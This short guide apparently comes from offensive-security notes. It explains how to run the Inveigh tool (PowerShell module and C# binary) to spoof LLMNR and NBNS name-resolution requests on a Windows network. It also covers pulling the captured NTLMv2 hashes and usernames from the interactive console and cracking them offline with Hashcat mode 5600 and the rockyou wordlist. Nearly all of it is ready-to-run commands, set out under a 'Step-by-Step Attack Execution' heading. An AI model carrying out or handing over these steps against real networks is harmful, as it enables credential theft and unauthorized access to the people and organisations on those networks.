Running Inveigh in PowerShell

  1. Load the Inveigh module into PowerShell:

    Import-Module .\Inveigh.ps1
    

  2. Check available parameters for the Invoke-Inveigh cmdlet:

    (Get-Command Invoke-Inveigh).Parameters
    

  3. Run Inveigh to start spoofing LLMNR and NBNS requests, with console and file output enabled:

    Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
    

Using InveighZero (C# Version)

  1. Run the C# version of Inveigh:

    .\Inveigh.exe
    

  2. Enter the interactive console: Press ESC to switch to interactive mode.

  3. Use the following commands within the console for specific information:

     - Get one captured NTLMv2 hash per user:

           GET NTLMV2UNIQUE

     - Get usernames and source IPs/hostnames:

           GET NTLMV2USERNAMES
    

Step-by-Step Attack Execution

  1. Start Inveigh with default settings:

    Invoke-Inveigh -LLMNR Y -NBNS Y -ConsoleOutput Y -FileOutput Y
    

  2. Use the console commands to view captured hashes and usernames.

  3. Captured hashes are saved in the specified output directory. By default, they are stored in:

    C:\Tools
    

  4. Prepare hashes for cracking. Ensure they are in a format compatible with Hashcat.

  5. Crack the hashes with Hashcat:

    hashcat -m 5600 hash_file.txt /usr/share/wordlists/rockyou.txt